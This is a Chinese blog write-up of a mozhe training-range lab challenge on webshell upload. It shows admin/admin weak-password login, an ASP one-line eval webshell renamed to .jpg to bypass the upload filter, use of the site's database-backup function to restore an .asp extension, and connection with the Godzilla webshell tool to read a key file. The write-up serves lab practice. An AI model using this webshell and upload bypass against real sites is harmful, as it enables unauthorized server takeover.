mozhe靶场: WebShell文件上传漏洞分析溯源(第5题) 题解(使用哥斯拉)
哥斯拉由java编写,可以在linux上使用.个人认为比冰蝎好用,用冰蝎连不上这个靶场,但是哥斯拉可以连的上.
github搜哥斯拉就能下载
首先登陆后台,弱口令 admin admin
点击添加文章,尝试上传一句话木马(一句话木马可以点击哥斯拉的生成)
webshell.asp
<%eval request("pass")%>
上传受限
只能上传jpg,gif,bmp,png等后缀的文件;
将后缀改为jpg后上传
aspshell.jpg
<%eval request("pass")%>
上传成功
并且得到aspshell.jpg的地址:
/uploads/20240201212919276.jpg
点击网站的数据备份,准备改shell后缀名
如图填写
并点击备份数据,
得到shell的路径:
c:\inetpub\wwwroot\admin\Databackup\aspshell.asp
拼接到ip:
http://219.153.49.228:47504/admin/Databackup/aspshell.asp
成功访问
添加到格斯拉:
启动格斯拉-->点击'目标'-->点击'添加'-->复制url,其他默认即可
右键并进入,成功连接,
在'C:/inetpub/'目录下有一个key.txt
双击打开
得到key
成了!
本文作者:sesmof
本文链接:https://www.cnblogs.com/sesmof/p/18000388
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
分类:
打靶 / mozhe靶场
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步